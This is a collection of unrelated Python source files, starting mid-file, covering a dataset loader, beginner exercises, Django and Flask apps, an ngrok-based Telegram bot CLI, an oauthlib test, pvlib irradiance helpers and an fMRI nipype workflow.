label = cv2.cvtColor(label, cv2.COLOR_BGR2GRAY)
image = image.reshape(1, image.shape[0], image.shape[1])
label = label.reshape(1, label.shape[0], label.shape[1])
if label.max() > 1:
label = label / 255
flipcode = random.choice([-1, 0, 1, 2])
if flipcode != 2:
image = self.augment(image, flipcode)
label = self.augment(label, flipcode)
return image, label
def __len__(self):
return len(self.imgs_path)
if __name__ == "__main__":
data_path = "train_image"
plate_dataset = SelfDataSet(data_path)
print(len(plate_dataset))
train_loader = oneflow.utils.data.DataLoader(
dataset=plate_dataset, batch_size=5, shuffle=True
)
for image, label in train_loader:
print(label.shape)
|
v = int(input()) # pool`s litters
p1 = int(input()) # litters per hour
p2 = int(input())
n = float(input()) # hours
litters_p1 = p1 * n
litters_p2 = p2 * n
all_litters_from_p1_p2 = litters_p1 + litters_p2
percent_pool = all_litters_from_p1_p2 / v * 100
percent_p1 = litters_p1 / all_litters_from_p1_p2 * 100
percent_p2 = litters_p2 / all_litters_from_p1_p2 * 100
overflow_pool = all_litters_from_p1_p2 - v # препълнен
if v >= all_litters_from_p1_p2:
print(f"The pool is {percent_pool:.2f}% full. Pipe 1: {percent_p1:.2f}%. Pipe 2: {percent_p2:.2f}%.")
elif v < all_litters_from_p1_p2:
print(f"For {n:.2f} hours the pool overflows with {overflow_pool:.2f} liters.")
|
# This is an example of adding a custom plugin to Projeny
# If you uncomment this then initialize a new project (for eg. "prj -p MyProject -bf")
# Then after that completes there should be a new file at UnityProjects/MyProject/MyP-win/MyExampleFile.txt
#import mtm.ioc.Container as Container
#from mtm.ioc.Inject import Inject
#class CustomProjectInitHandler:
#_varMgr = Inject('VarManager')
#def onProjectInit(self, projectName, platform):
#outputPath = self._varMgr.expand('[ProjectPlatformRoot]/MyExampleFile.txt')
#with open(outputPath, 'w') as f:
#f.write("This is a sample of configuring the generated project directory")
#Container.bind('ProjectInitHandlers').toSingle(CustomProjectInitHandler)
|
#!/USSR/bin/env python
import argparse
import biom
from biom.util import biom_open
import numpy as np
import pandas as pd
from scipy.sparse import coo_matrix
import scipy as sp
def main(args):
table = biom.load_table(args.table)
aligns = pd.read_table(args.align, header=None)
seq_to_genome = aligns[[0, 2, 4]].groupby(by=[0]).min()[2]
ids = list(set(seq_to_genome.index) & set(table.ids(axis='observation')))
t = table.filter(ids, axis='observation')
bin_f = lambda i, x: seq_to_genome.loc[i]
t = t.collapse(bin_f, norm=False, min_group_size=1, axis='observation')
#t = groupby_sum(t, seq_to_genome)
with biom_open(args.output_table, 'w') as f:
t.to_hdf5(f, 'collapsed')
if __name__ == "__main__":
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('--table', type=str, required=True,
help='Path to biom table.')
parser.add_argument('--align', type=str, required=True,
help='Path to sam alignments.')
parser.add_argument('--output-table', type=str, required=True,
help='Path to output fasta file.')
args = parser.parse_args()
main(args)
|
import random
import string
class Helper:
""" Helper function just to do some stuff. """
def get_random_string(self, length):
""" Function to generate random string. """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
|
import requests
import json
import csv
import sys
# Stream List
resp = requests.get('http://listen.di.fm/[streamlist]')
resplist = resp.json()
respsort = sorted(resplist, key=lambda k: k['name'])
respfinal = []
for i in respsort:
print(i['id'],"\t",i['name'])
respfinal.append({'id': i['id'], 'name': i['name'], 'key': i['key']})
# Save Stream List to CSV
with open('streamlist.csv', 'w') as csvfile:
fieldnames = ['id', 'name', 'key']
writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames)
writer.writeheader()
for i in respfinal:
writer.writerow(i)
# Get Track List from Stream ID
streamid = input("Enter Stream ID: ")
tlurl = 'http://api.audioaddict.com/v1/di/track_history/channel/' + streamid
resp = requests.get(tlurl)
resplist = resp.json()
respsort = sorted(resplist, key=lambda k: k['started'])
respfinal = []
for i in respsort:
if i['artist'] != None:
if i['title'] != None:
print(i['artist'],"-",i['title'])
respfinal.append({'artist': i['artist'], 'title': i['title'], 'duration': i['duration'], 'started': i['started']})
# Save Track List to CSV
with open('tracklist.csv', 'a') as csvfile:
fieldnames = ['artist', 'title', 'duration', 'started']
writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames)
writer.writeheader() # Removed while appending entries.
for i in respfinal:
writer.writerow(i)
|
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from django.utils.safestring import mark_safe
from .models import Car, SubType, Transmission, Fuel
from src.medias.models import Photo, Video
class PhotoInline(GenericTabularInline):
model = Photo
extra = 3
max_num = 15
class VideoInline(GenericTabularInline):
model = Video
max_num = 1
class CarModelAdmin(admin.ModelAdmin):
list_display = [
'model',
'brand',
'year',
'sub_type',
'price',
'status',
'views',
]
list_display_links = [
'model',
]
list_editable = [
'brand',
'year',
'sub_type',
'price',
'status',
]
list_filter = [
'brand',
'model',
'sub_type',
'status',
]
search_fields = [
'brand',
'model',
'year',
'description',
'status',
]
# fieldsets = [
# (_('Author'), {'fields': ['author','']}),
# ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),
# ]
readonly_fields = ["imagen_principal_del_carro"]
def imagen_principal_del_carro(self, obj):
return mark_safe('<img src="{url}" width="{width}" height={height} />'.format(
url=obj.img.url,
width=obj.img.width / 3,
height=obj.img.height / 3,
)
)
inlines = [PhotoInline]
class Meta:
model = Car
admin.site.register(Car, CarModelAdmin)
admin.site.register(SubType)
admin.site.register(Fuel)
admin.site.register(Transmission)
|
# library
from click.decorators import command
from pyngrok import ngrok
import requests
import json
import click
from click import echo, style
from pyfiglet import Figlet, main
import colorama
import os.path
import subprocess
import shutil
import os
from time import sleep
import sys
# start
banner = Figlet(font="slant")
banner_txt = banner.renderText("RaRa")
echo(style(banner_txt, fg='blue'))
dirmain = os.path.dirname(os.path.abspath(__file__))
dirBot = dirmain+"\\Bot"
# defs
def copyDirectory(src, dest):
try:
shutil.copytree(src, dest)
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
except OSError as e:
print('Directory not copied. Error: %s' % e)
def editfile(file, content):
path = dirBot+'//'+file
with open(path, "w") as f:
f.write(content)
def Botedit(port, token):
editfile('tools/local/public.bat',
f'@echo off\nrara public {port} ../../src/token.txt')
editfile('tools/local/local.bat', f'@echo off\nrara php {port} ../../src')
editfile(
'local.bat', f'@echo off\ncd tools/local\nstart cmd /c local.bat \npublic.bat')
editfile('src/token.txt', token)
def creatproject(name, port, token):
Botedit(port, token)
copyDirectory(dirBot, name)
def token_read(path):
f = open(path, 'r')
return f.read()
@click.group(chain=True)
@click.version_option("0.1.0")
def cli():
pass
@cli.command('public',)
@click.argument('port')
@click.argument('token', required=False)
def public(port, token=""):
"""
public url <port>(required) <token> (telegram bot - file/text)
"""
if port:
tun = ngrok.connect(port, bind_tls=True)
url = tun.public_url
if token:
if os.path.isfile(token):
bot = token_read(token)
else:
bot = token
send = "https://api.telegram.org/bot"+bot+"/setWebhook?url="+url
api = requests.get(send)
text = api.text
result = json.loads(text)
if result['ok'] == True:
echo(style("\nWebhook is set", bold=True, fg='green'))
else:
echo(style("\nWebhook isn't set", bold=True, fg='red'))
echo(
style("\nERROR : "+result['description'], bold=True, fg='red'))
exit()
echo(
style(f"\nLocal Server Listen http://localhost:{port}", bold=True, fg='green'))
echo(style('\nPublic Server listen : '+url, bold=True, fg='green'))
ngrok_process = ngrok.get_ngrok_process()
try:
ngrok_process.proc.wait()
except KeyboardInterrupt:
echo(style("\n\nServer is off", bold=True, fg='red'),)
ngrok.kill()
@cli.command('php')
@click.argument('port')
@click.argument('path', required=False)
def php(port, path):
"""
start php <port>(required) <path>
"""
if path:
subprocess.call(f"php -S localhost:{port} -t {path}")
else:
subprocess.call(f"php -S localhost:{port}")
@cli.command('create')
@click.argument('name')
def create(name):
"""
Create New Telegram bot project php <name>(required)
"""
port = int(click.prompt(style('Project Port ', fg='green')))
token = click.prompt(style('\nTelegram Bot Token ', fg='green'))
vscode = str(click.prompt(style('\nOpen in vscode ?[y/n]', fg='green')))
creatproject(name, port, token)
project = os.getcwd()+"/"+name
if vscode.lower() == 'y':
os.system("code "+project)
def main():
cli()
# run
if __name__ == "__main__":
main()
|
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
import redis
from flask_cors import *
import time
import json
from pyecharts import options as opts
from pyecharts.charts import Graph
# /*----------------Flask and DB----------------*/
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "mysql+mysqldb://root:password@localhost:3306/package"
db = SQLAlchemy(app)
r = redis.Redis(host="127.0.0.1", port=6379)
CORS(app, supports_credentials=True)
# /*----------------DB Model----------------*/
# collected package
class Pkg(db.Model):
__tablename__ = 'pkg'
id = db.Column(db.Integer, primary_key=True)
Ty = db.Column(db.String(8)) # type
protocol = db.Column(db.String(10))
daddr = db.Column(db.String(40))
dport = db.Column(db.Integer)
saddr = db.Column(db.String(40))
sport = db.Column(db.Integer)
send_byte = db.Column(db.Integer)
recv_byte = db.Column(db.Integer)
time = db.Column(db.Integer)
pid = db.Column(db.Integer)
com = db.Column(db.String(20))
host = db.Column(db.String(40))
# doubt IP and danger IP
class BanIP(db.Model):
__tablename__ = "banIP"
id = db.Column(db.Integer, primary_key=True)
ban_ip = db.Column(db.String(40))
banned = db.Column(db.Boolean)
def __init__(self, ban_ip, banned):
self.ban_ip = ban_ip
self.banned = banned
# /*----------------Helper Function----------------*/
def ban(saddr, banned=True): # True => banned, False => warning
item = BanIP.query.filter(BanIP.ban_ip == saddr).first()
print(item)
if item is None:
new_ban_ip = BanIP(ban_ip=saddr, banned=banned)
db.session.add(new_ban_ip)
if banned:
r["update_time"] = int(time.time())
db.session.commit()
elif item.banned != banned:
item.banned = banned
r["update_time"] = int(time.time())
db.session.commit()
else:
print("Banned ip add failed. " + str(saddr) + " exists.")
def broadcast_to_clients():
import json
banned_IPs = []
IPs = BanIP.query.filter(BanIP.banned == True).all()
for ip in IPs:
banned_IPs.append(ip.ban_ip)
r.publish("Banned IPs", json.dumps(banned_IPs))
def add_danger_ip(saddr):
ban(saddr, banned=True)
def add_doubt_ip(saddr):
ban(saddr, banned=False)
# /*----------------IP Control Interface----------------*/
# 前一秒的流量信息,时间戳和流量大小
@app.route("/getnetdata", methods=["GET"])
def getNetData():
hostIP = request.args.get("hostip")
dockerIP = request.args.get("dockerip")
protocol = request.args.get("protocol")
now = time.time()
print(Pkg.query.all()[-1].time)
print(now)
print(hostIP)
print(dockerIP)
print(protocol)
pkgs = Pkg.query.filter(Pkg.daddr == dockerIP, Pkg.protocol == protocol, Pkg.host == hostIP,
Pkg.time >= now - 2).all()
print(pkgs)
ret = 0
last_time = int(time.time())
try:
last_time = pkgs[-1].time
except:
pass
for pkg in pkgs:
ret += pkg.send_byte + pkg.recv_byte
data = {
"byte": ret,
"time": last_time
}
return jsonify(data)
# 设置IP规则
@app.route("/setbanip", methods=["POST"])
def setBanIP():
data = request.json.get("data")
value = request.json.get("value")
global dangerip
global doubtip
dangerips = []
doubtips = []
# get the rules
for i in data:
if i["key"] in value:
# print(doubtips)
dangerips.append(i)
else:
doubtips.append(i)
# update the database
for i in dangerips:
add_danger_ip(i["label"])
for i in doubtips:
add_doubt_ip(i["label"])
# use redis to seng msg to hosts
broadcast_to_clients()
return "OK"
# 获取所有的可疑IP和危险IP
@app.route("/getbanip", methods=["GET"])
def getBanIP():
ret = {
"danger": [],
"doubt": []
}
IPs = BanIP.query.filter().all()
for ip in IPs:
if ip.banned:
ret["danger"].append(ip.ban_ip)
else:
ret["doubt"].append(ip.ban_ip)
return jsonify(ret)
# /*----------------Typology Show Interface----------------*/
# Receive Msg From Hosts
@app.route("/refreshdockermsg", methods=["POST"])
def dockerMsg():
data = request.json
host = data["host"]
datalist = data["data"]
r.hset("topology", host, datalist)
return "ok"
@app.route("/getdockermsg", methods=["GET"])
def getDockerMsg():
host = request.args.get("host")
docker = request.args.get("docker")
dockers = json.loads(r.hget("typology", host))
tar = None
for doc in dockers:
print(doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"], docker)
if docker == doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]:
tar = doc
break
return jsonify(tar)
@app.route("/getdockerstats", methods=["GET"])
def getDockerStats():
dockerID = request.args.get("dockerid")
r.publish("Container Msg", dockerID)
start = int(time.time())
while True:
stats = r.get("containermsg")
if stats is not None:
break
elif int(time.time())-start > 2:
break
ret = json.loads(stats)
return jsonify(ret)
@app.route("/getipsortlist")
def getIPSortList():
ipdata = Pkg.query.all()
ipdict = {}
for i in ipdata:
ipdict[i.saddr] = 0
for i in ipdata:
ipdict[i.saddr] += 1
sortlist = sorted(ipdict.items(), key=lambda kv:(kv[1], kv[0]), reverse=True)
return jsonify(sortlist)
@app.route("/getradarmsg")
def getRadarMsg():
danger = []
doubt = []
IPs = BanIP.query.all()
for ip in IPs:
if ip.banned:
danger.append(ip.ban_ip)
else:
doubt.append(ip.ban_ip)
ipdata = Pkg.query.all()
ipdict = {}
averpkg = 0
maxpkg = 0
pkgcnt = 0
for i in ipdata:
pkgcnt += 1
averpkg += i.send_byte + i.recv_byte
if i.send_byte + i.recv_byte > maxpkg:
maxpkg = i.send_byte + i.recv_byte
ipdict[i.saddr] = 0
if averpkg != 0:
averpkg /= pkgcnt
totalipnum = len(ipdict)
hostips = r.hkeys("typology")
# print(hostips)
hosts = [json.loads(r.hget("typology", hostip)) for hostip in hostips]
# print(hosts)
maxmemuse = 0
avermemuse = 0
cnt = 0
for host in hosts:
for i in host:
cnt += 1
avermemuse += i["stats"]["memory_stats"]["usage"]
if i["stats"]["memory_stats"]["max_usage"] > maxmemuse:
maxmemuse = i["stats"]["memory_stats"]["max_usage"]
if cnt != 0:
avermemuse /= cnt
print("cnt=", cnt)
return jsonify({
"dangerrate": len(danger)/totalipnum,
"doubtrate": len(doubt)/totalipnum,
"maxmemuse": maxmemuse,
"avermemuse":avermemuse,
"averpkg": averpkg,
"maxpkg": maxpkg
})
def graph_base() -> Graph:
nodes = []
links = []
categories = [
{"symbol": "circle", 'name': 'ryu'},
{"symbol": "diamond", 'name': 'host'},
{"symbol": "roundRect", 'name': 'dockerdata'},
]
ryu = opts.GraphNode(name="RYU", symbol_size=40, category=0) # symbol='roundRect'
nodes.append(ryu)
doc_id = 1
for key in r.hkeys("typology"):
host = opts.GraphNode(name=key, symbol_size=30, category=1) # symbol='diamond'
nodes.append(host)
ryuHostLink = opts.GraphLink(source="RYU", target=key)
links.append(ryuHostLink)
dockerlist = json.loads(r.hget("typology", key))
print(dockerlist)
for doc in dockerlist:
docName = doc["Names"][0]
docInfo = str(key, encoding='utf-8') + '/' + doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]
new_node = opts.GraphNode(name=str(doc_id) + docName, symbol_size=20, category=2, value=docInfo)
nodes.append(new_node)
hostDocLink = opts.GraphLink(source=key, target=str(doc_id) + docName)
links.append(hostDocLink)
doc_id += 1
linestyle_opts = opts.LineStyleOpts(
is_show=True,
width=2,
curve=0.1,
type_="solid",
color="orange",
)
g = (
Graph()
.add("", nodes, links, repulsion=1000, categories=categories,
label_opts=opts.LabelOpts(is_show=True, position="left", color='white'),
linestyle_opts=linestyle_opts)
.set_global_opts(title_opts=opts.TitleOpts(title=""))
)
return g
@app.route("/graphchart", methods=["GET"])
def get_bar_chart():
c = graph_base()
return c.dump_options_with_quotes()
if __name__ == '__main__':
app.run(host="127.0.0.1", port=5000, debug=True)
|
import sys, os
sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定
import numpy as np
from dataset.mnist import load_mnist
from controllers.controller import Controller
from modules.pklController import PKL
# データの読み込み
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
# 設定
# ハイパーパラメータ
#iters_num = 10000 # 繰り返しの回数を適宜設定する
iters_num = 100000 # 繰り返しの回数を適宜設定する
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
filename = "mymnist_01.pkl"
# instance
controller = Controller()
pkl = PKL()
# exec
params = pkl.getRandomPKL(iters_num, train_size, batch_size, learning_rate)
controller.setParams(params)
# savePKL
pkl.savePKL(filename, params);
# accuracy
trycount = 1000
accuracy_cnt = 0
result = np.zeros((10, 10))
for i in range(len(x_test)):
p = controller.accuracy(x_test[i])
a = np.argmax(t_test[i])
#print("p = " + str(p))
#print("a = " + str(a))
result[p][a] += 1
#print(t_test[i])
if p == a:
accuracy_cnt += 1
if (i == trycount):
break
print("Accuracy:" + str(float(accuracy_cnt) / trycount))
print(result)
|
from django.db import models
from improved_user.model_mixins import AbstractUser
# Create your models here.
class User(AbstractUser):
"""A User model that extends the Improved User"""
is_rowo = models.BooleanField(
default=False, help_text="Is the User a Robin Wood member?"
)
|
import pandas as pd
import numpy as np
import pvlib
import logging
log = logging.getLogger(__name__)
class IrradianceDataset(pd.DataFrame):
"""pandas.DataFrame extension class for location-aware irradiance data
This class is intended to make life a bit easier when working with irradiance
datasets. It extends pandas.DataFrame by adding a `location` attribute, which
gives access to a pvlib.location.Location object, allowing for generation
of solar position and clear sky data.
In addition, several helper attributes are provided to automate certain
operations:
Parameters
----------
data : a pandas.Datafame, OR any argument that can be passed to a DataFrame
constructor, such as a list of dicts.
location : a pvlib.location.Location instance
Attributes
----------
g : irradiance components
clear : clear-sky irradiance components
sp : solar position data
k : clearness index coponents
k_star : filtered clearness index components
k_star_angle : solar elevation threshold for the filtered clearness index
set to 8.0 be default
k_star_sensitivity : sensitivity parameter for the filtered clearness index
set to 50 by default
Example
-------
```
data = IrradianceDataset(df, location)
data.k_star.plot()
```
"""
_metadata = ['location', 'k_star_sensitivity', 'k_star_angle']
@classmethod
def _internal_ctor(cls, *args, **kwargs):
kwargs['location'] = None
return cls(*args, **kwargs)
def __init__(self, data, location=None, index=None, columns=None, dtype=None, copy=True):
super(IrradianceDataset, self).__init__(data=data,
index=index,
columns=columns,
dtype=dtype,
copy=copy)
self.location = location
self.k_star_sensitivity = 50
self.k_star_angle = 7
@property
def _constructor(self):
return IrradianceDataset
@property
def _constructor_sliced(self):
return IrradianceDatasetSeries
@property
def is_complete(self):
"""Returns true if this dataset has all three of ghi, dni, and dhi"""
return {'ghi', 'dhi', 'dni'} <= set(self.columns)
@property
def is_ghi_only(self):
"""Returns true if this dataset has only ghi"""
c = self.columns
return 'ghi' in c and 'dhi' not in c and 'dni' not in c
def complete_irradiance(self):
"""This code adapted from pvlib."""
cols = set(self.columns)
if {'ghi', 'dhi'} <= cols and 'dni' not in cols:
log.info("Completing DNI irradiance")
self.loc[:, 'dni'] = pvlib.irradiance.dni(
self['ghi'],
self['dhi'],
self.sp.zenith,
clearsky_dni=self.clear.dni,
clearsky_tolerance=1.1)
elif {'dni', 'dhi'} <= cols and 'ghi' not in cols:
log.info("Completing GHI irradiance")
self.loc[:, 'ghi'] = (
self['dni'] * np.cos(np.radians(self.sp.zenith) +
self['dhi']))
elif {'dni', 'ghi'} <= cols and 'dhi' not in cols:
log.info("Completing DHI irradiance")
self.loc[:, 'dhi'] = (
self['ghi'] - self['dni'] * np.cos(np.radians(self.sp.zenith))
)
return self
@property
def g(self):
if len({'ghi', 'dni', 'dhi'} & set(self.columns)) == 0:
log.info("No irradiance data. Trying to build from clearness index.")
g = self.clear * self.k_star
for col in g:
self.loc[:, col] = g[col]
if not (self.is_complete or self.is_ghi_only):
self.complete_irradiance()
return pd.DataFrame(
self[[col for col in self.columns if col in ('ghi', 'dni', 'dhi')]]
)
@property
def sp(self):
sp_cols = list(filter(lambda c: c[:3] == 'sp_', self.columns))
if len(sp_cols) == 0:
log.info("Calculating solar position")
sp = self.location.get_solarposition(self.index)
sp_cols = [f'sp_{col}' for col in sp.columns]
for old, new in zip(sp.columns, sp_cols):
self.loc[:, new] = sp[old]
return pd.DataFrame(
self[sp_cols]
).rename(columns={col:col[3:] for col in sp_cols})
@property
def clear(self):
clear_cols = list(filter(lambda c: c[:6] == 'clear_', self.columns))
if len(clear_cols) == 0:
# TODO add a check that the clear cols correspond to the g cols
log.info("Calculating clear sky irradiance")
clear = self.location.get_clearsky(self.index, solar_position=self.sp)
clear_cols = [f'clear_{col}' for col in clear.columns if col in self.columns or f'k_{col}' in self.columns]
for old, new in zip(clear.columns, clear_cols):
self.loc[:, new] = clear[old]
return pd.DataFrame(
self[clear_cols]
).rename(columns={col:col[6:] for col in clear_cols})
@property
def k(self):
k_cols = list(filter(lambda c: c[:2] == 'k_', self.columns))
if len(k_cols) == 0:
log.info("Calculating clearness index")
k = self.g / self.clear
k_cols = [f'k_{col}' for col in k.columns]
for old, new in zip(k.columns, k_cols):
self.loc[:, new] = k[old]
return pd.DataFrame(
self[k_cols]
).rename(columns={col:col[2:] for col in k_cols})
return self
@property
def k_star(self):
z = self.sp.zenith * np.pi / 180
angle_above_cutoff = z - np.pi / 2 + np.pi * self.k_star_angle / 180
is_above = 1/(1 + np.exp(self.k_star_sensitivity*angle_above_cutoff))
return (self.k.mul(is_above, axis=0)
.replace(-np.inf, 0)
.replace(np.inf, 0)
.fillna(0)
.add(1 - is_above, axis=0))
class IrradianceDatasetSeries(pd.Series):
_metadata = ['location', 'k_star_sensitivity', 'k_star_angle']
@property
def _constructor(self):
return IrradianceDatasetSeries
@property
def _constructor_expanddim(self):
return IrradianceDataset
|
# Exercício Python 65: Crie um programa que leia vários números inteiros pelo teclado.
# No final da execução, mostre a média entre todos os valores e qual foi o maior e o menor valores lidos.
# O programa deve perguntar ao usuário se ele quer ou não continuar a digitar valores.
print('\033[1;33m====== EX 065 ======\033[m')
op = 'Ss'
cont = soma = media = maior = menor = 0
while op in 'Ss':
n = int(input('Digite um número: '))
soma += n
cont += 1
if cont == 1:
maior = menor = n
else:
if n > maior:
maior = n
elif n < menor:
menor = n
op = str(input('Quer continuar? [S/N]')).strip().upper()
media = soma / cont
print('Você digitou {} números e a média foi de {}'.format(cont, media))
print('O maior númeoro foi {} e o menor {}'.format(maior, menor))
|
"""Ensure extra credentials can be supplied for inclusion in tokens.
"""
from __future__ import absolute_import, unicode_literals
import mock
from ....unittest import TestCase
from oauthlib.oauth2 import RequestValidator
from oauthlib.oauth2 import WebApplicationServer, MobileApplicationServer
from oauthlib.oauth2 import LegacyApplicationServer, BackendApplicationServer
class ExtraCredentialsTest(TestCase):
def set_client(self, request):
request.client = mock.MagicMock()
request.client.client_id = 'mocked'
return True
def setUp(self):
self.validator = mock.MagicMock(spec=RequestValidator)
self.validator.get_default_redirect_uri.return_value = 'https://i.b/cb'
self.web = WebApplicationServer(self.validator)
self.mobile = MobileApplicationServer(self.validator)
self.legacy = LegacyApplicationServer(self.validator)
self.backend = BackendApplicationServer(self.validator)
def test_post_authorization_request(self):
def save_code(client_id, token, request):
self.assertEqual('creds', request.extra)
def save_token(token, request):
self.assertEqual('creds', request.extra)
# Authorization code grant
self.validator.save_authorization_code.side_effect = save_code
self.web.create_authorization_response(
'https://i.b/auth?client_id=foo&response_type=code',
scopes=['foo'],
credentials={'extra': 'creds'})
# Implicit grant
self.validator.save_bearer_token.side_effect = save_token
self.mobile.create_authorization_response(
'https://i.b/auth?client_id=foo&response_type=token',
scopes=['foo'],
credentials={'extra': 'creds'})
def test_token_request(self):
def save_token(token, request):
self.assertIn('extra', token)
self.validator.save_bearer_token.side_effect = save_token
self.validator.authenticate_client.side_effect = self.set_client
# Authorization code grant
self.web.create_token_response('https://i.b/token',
body='grant_type=authorization_code&code=foo',
credentials={'extra': 'creds'})
# Password credentials grant
self.legacy.create_token_response('https://i.b/token',
body='grant_type=password&username=foo&password=bar',
credentials={'extra': 'creds'})
# Client credentials grant
self.backend.create_token_response('https://i.b/token',
body='grant_type=client_credentials',
credentials={'extra': 'creds'})
|
#!/usr/bin/env python
from nipype.interfaces.utility import Split
from nipype.interfaces.base import Bunch
from nipype.algorithms.modelgen import SpecifyModel
import nipype.interfaces.fsl as fsl
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.utility import Function
from nipype.interfaces.fsl import Merge
from counter import Counter
import copy
import os
def get_dm(designs,index):
from nipype.interfaces.base import Bunch
subject_info = Bunch(conditions = designs.single_events[index][0], onsets = designs.single_events[index][1], durations = designs.single_events[index][2])
return subject_info
def make_designs(log):
from stdec import stdec
# Generate session_infos for all single trials
nick = "tempsub"
conditions = ["PT","WT","PL","WL","AT","PTerr","WTerr","PLerr","WLerr","ATerr","miss"]
cond_cols = ["Code","Type"]
cond_pattern = [ [['zucz*'],['hit']],[['zsw*'],['hit']],
[['nucz*'],['incorrect']],[['nsw*'],['incorrect']],
[['zaut*'],['hit']], [['zucz*'],['incorrect']],
[['zsw*'],['incorrect']],[['nucz*'],['hit']],
[['nsw*'],['hit']],[['zaut*'],['incorrect']],
[['.*'],['miss']]]
designs = stdec(nick,log,cond_cols,conditions,cond_pattern)
designs.read_logfile()
designs.getconds()
designs.collapse_dm()
designs.extract_events()
return designs
def write_conditions(designs):
import numpy as np
import os
np.savetxt("conditions.txt",designs.all_labels,fmt="%s")
return os.path.abspath("conditions.txt")
def run_workflow(args):
eb = pe.Workflow(name='eb')
work_dir = '/home/data/scratch/UP_ST/' + args.subject
eb.base_dir = work_dir
get_designs = pe.Node(Function(input_names = ['log'], output_names = ['designs'], function=make_designs), name="get_designs")
get_designs.inputs.log = args.log
#ntrials = len(designs.all_labels)
indxs = range(120)
# Iterate over the list of timings
get_info = pe.Node(Function(input_names = ['designs','index'], output_names = ['info'], function=get_dm), name="get_info")
get_info.iterables = ('index', [1])
#get_info.iterables = ('idx', indxs)
eb.connect(get_designs,'designs',get_info,'designs')
# Save text file with trial list
write_cond = pe.Node(Function(input_names = ['designs'], output_names = ['condfile'], function=write_conditions), name="write_conditions")
eb.connect(get_designs,'designs',write_cond,'designs')
# Specify model
s = pe.Node(SpecifyModel(),name='sm')
s.inputs.input_units = 'secs'
s.inputs.time_repetition = 2.5
s.inputs.high_pass_filter_cutoff = 100.
s.inputs.functional_runs = args.file
eb.connect(get_info,'info',s,'subject_info')
# Create FSL Level 1 Design
l1d = pe.Node(fsl.Level1Design(),name='l1d')
l1d.inputs.interscan_interval = 2.5
l1d.inputs.bases = {'dgamma': {'derivs' : False}}
l1d.inputs.model_serial_correlations = False
l1d.inputs.contrasts = [('st','T',['all','st'],[0, 1])]
eb.connect(s,'session_info',l1d,'session_info')
# Get it into FEAT-compatible format
fm = pe.Node(fsl.FEATModel(),name='feet')
eb.connect(l1d,'ev_files',fm,'ev_files')
eb.connect(l1d,'fsf_files',fm,'fsf_file')
# Estimate the GLM
glm = pe.Node(fsl.GLM(),name='glm')
glm.inputs.out_cope = 'beta.nii.gz'
glm.inputs.in_file = args.file
eb.connect(fm,'design_file',glm,'design')
eb.connect(fm,'con_file',glm,'contrasts')
# Merge estimated betas into a single volume
merger = pe.JoinNode(fsl.Merge(), joinsource = 'get_info', joinfield = 'in_files', name = 'merger')
merger.inputs.dimension = 't'
merger.inputs.output_type = 'NIFTI_GZ'
eb.connect(glm,'out_cope',merger,'in_files')
# Write outputs
datasink = pe.Node(nio.DataSink(), name='sinker')
datasink.inputs.base_directory = '/home/mfalkiewicz/expriments/UP/preprocessed/deconvolution'
datasink.inputs.container = args.subject
eb.connect(infosource,'subject_id',datasink,'containter')
eb.connect(merger,'merged_file',datasink,'single_trials')
eb.connect(write_cond,'condfile',datasink,'conditions')
# Run the whole thing
#eb.run(plugin='CondorDAGMan')
#eb.run(plugin='MultiProc')
eb.run()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("-s", "--subject", dest="subject",
help="Subject name", required=True)
parser.add_argument("-f", "--infile", dest="file",
help="Input filename", required=True)
parser.add_argument("-d", "--logfile", dest="log",
help="Logfile", required=True)
args = parser.parse_args()
run_workflow(args)
|
from django.core.management.base import BaseCommand, CommandError
from static_models.view_generator import ViewStaticManager
from static_models.settings import settings
class Command(BaseCommand):
help = 'Create/update static files'
def add_arguments(self, parser):
parser.add_argument(
'--sync',
action='store_true',
help="Before generation, delete existing files.",
)
parser.add_argument(
'-o',
'--overwrite',
action='store_true',
help="Replace currently existing files (default is to ignore)",
)
parser.add_argument(
'-e',
'--html_extension',
action='store_true',
help="Add '.html' extension to generated files.",
)
def normalize_viewsetting(self, vs):
if (not('query' in vs)):
vs['query'] = None
if (not('urls' in vs)):
vs['urls'] = []
if (not('filename' in vs)):
vs['filename'] = None
if (not('filename_from_field' in vs)):
vs['filename_from_field'] = 'pk'
if (not('filepath' in vs)):
vs['filepath'] = None
def handle(self, *args, **options):
extension = ''
if (options['html_extension']):
extension = 'html'
normalised_viewsettings = [self.normalize_viewsetting(vs) for vs in settings.modelviews]
# ok, generate
count = 0
if (options['sync'] and (options['verbosity'] > 0)):
print("Directories will be cleared before generation")
for vs in settings.modelviews:
g = ViewStaticManager(
vs['view'],
vs['query'],
vs['urls'],
vs['filename'],
vs['filename_from_field'],
vs['filepath'],
overwrite=options['overwrite'],
extension=extension,
)
delete_count = 0
if (options['sync']):
delete_count = g.delete()
count = g.create()
if (options['verbosity'] > 0):
print("{} static file(s) created at '{}'".format(count, g.location))
|
z = int(input())
vetor = list(map(int, input().split()))
m2 = m3 = m4 = m5 = 0
for y in range(0, z):
if vetor[y] % 2 == 0:
m2 +=1
if vetor[y] % 3 == 0:
m3 += 1
if vetor[y] % 4 == 0:
m4 += 1
if vetor[y] % 5 == 0:
m5 += 1
print('{} Multiplo(s) de 2'.format(m2))
print('{} Multiplo(s) de 3'.format(m3))
print('{} Multiplo(s) de 4'.format(m4))
print('{} Multiplo(s) de 5'.format(m5))
|
"""
Generic utilities used by the metacells code.
Arguably all(most) of these belong in more general package(s).
All the functions included here are exported under ``metacells.ut``.
"""
